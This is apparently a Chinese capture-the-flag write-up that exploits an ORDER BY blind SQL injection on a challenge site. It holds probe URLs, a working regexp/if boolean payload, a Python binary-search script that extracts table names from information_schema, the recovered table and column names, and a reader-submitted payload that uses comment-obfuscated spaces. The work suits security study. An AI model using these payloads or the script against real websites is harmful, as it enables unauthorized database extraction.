image.png
看到 URL 中的 DESC 参数联想到 SQL 语句中的 Order By 语法
姑且认为是 MySQL
查了一下 MySQL 的语法 :
https://dev.mysql.com/doc/refman/5.7/en/sorting-rows.html
https://dev.mysql.com/doc/refman/5.7/en/order-by-optimization.html
select username, password from users order by username desc
image.png
尝试测试 :
select username, password from users order by password, username desc
http://game.sycsec.com:2008/Steam/1.php?type=ASC
发现两者返回顺序不同
应该就是这里的注入点了
%YI3YPL9GH(GCU%}RQG75VO.png
image.png
还是没有深入阅读 MySQL 的文档 , 太菜了 , Order By 只能用于 union 之后
那么应该是只能盲注了 , 盲注需要构造一个可控的 Boolean
参考文章 :
image.png
http://game.sycsec.com:2008/Steam/1.php?type=,1%23 # 返回正常
http://game.sycsec.com:2008/Steam/1.php?type=,0%23 # SQL 执行出错
http://game.sycsec.com:2008/Steam/1.php?type=,user%23 # 返回空 , 说明列名不存在
http://game.sycsec.com:2008/Steam/1.php?type=,username%23 # 返回空 , 说明列名不存在
http://game.sycsec.com:2008/Steam/1.php?type=,score%23 # 返回正常 , 列名存在
找到一个可用 Payload :
http://game.sycsec.com:2008/Steam/1.php?type=,(select+1+regexp+if(substring((select+concat(table_name)from+information_schema.tables+where+table_schema%3ddatabase()+limit+0,1),1,1)%3C0x55,1,0x00))%23
(select 1 regexp if(1,1,0x00))
(select 1 regexp if(1,1,0))
测试了一个小时 , 就是找不到什么上面的 Payload 可以而下面的不行 , 想要骂娘了, *&()^#@()!)&S
脚本 :
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
def check(content):
return "Terraria" in content
def guess(url):
response = requests.get(url)
content = response.content
return check(content)
data = ""
for i in range(0x20):
LEFT = 0x00
RIGHT = 0x100
P = (RIGHT + LEFT) / 2
while RIGHT - LEFT > 1:
url = "http://game.sycsec.com:2008/Steam/1.php?type=,(select 1 regexp if(ascii(substring((select concat(table_name)from information_schema.tables where table_schema%3ddatabase() limit 0,1),"+str(i)+",1))%3c"+hex(P)+",1,0x00))%23"
print "[+] Payload : %s" % (url)
print "[%d]>>>>[%d]<<<<[%d]" % (LEFT, P, RIGHT)
if guess(url):
RIGHT = P
else:
LEFT = P
P = (RIGHT + LEFT) / 2
data += chr(P)
print "[+] Data : %s" % (data)
[+] Tables : F1AG_1S_H3RE,GAMES
[+] Columns : ID,F14G_IS,ID,NAME,TIMES,SCORE,ACHIEVEMENT,PRICE
网友评论
payload = 'and/**/IF((mid((SELECT/**/*/**/from/**/f1ag_1s_h3re/**/limit/**/1),1,%d)<>\'%s\'),1,(select/**/1/**/union/**/select/**/2));' % (i,(password+c))